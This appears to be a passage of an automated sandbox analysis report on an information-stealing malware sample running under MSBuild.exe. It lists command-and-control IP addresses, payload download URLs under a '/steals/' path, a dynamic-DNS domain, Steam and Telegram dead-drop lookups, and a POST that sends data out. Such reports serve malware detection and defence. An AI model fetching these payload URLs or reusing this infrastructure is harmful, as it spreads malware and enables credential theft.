Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00405010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00405010

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s41l0 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steals/jen1hg.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steals/gfn1go.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: liernessfornicsa.shop
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org
Source: global traffic	DNS traffic detected: DNS query: t.me

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/gfn1go.exe
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/gfn1go.exe1
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/gfn1go.exedary=----HIDAKFIJJKJJJKEBKJEHult-release
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/jen1hg.exe
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/jen1hg.exe1kkkk691078http://147.45.44.104/steals/gfn1go.exe1kkkk/24.6.0.
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/jen1hg.exeftware
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPHTSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.JKEBFHJDBF
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.JDBF
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/#W
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/Z
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/f
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/kV
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/l
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/r
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/s
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/stem32
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.orgF
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zaptoHJDBF
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr, gfn1go[1].exe.1.dr	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1BUnsupportedKeyDerivationAlgo
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform
Source: DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr, gfn1go[1].exe.1.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform0Tran
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform:Unsu
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr, gfn1go[1].exe.1.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr, gfn1go[1].exe.1.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic
Source: gfn1go[1].exe.1.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision~http://schemas.xmlsoap.o
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthxhttp://schemas.xmlsoap.org/ws/2005
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
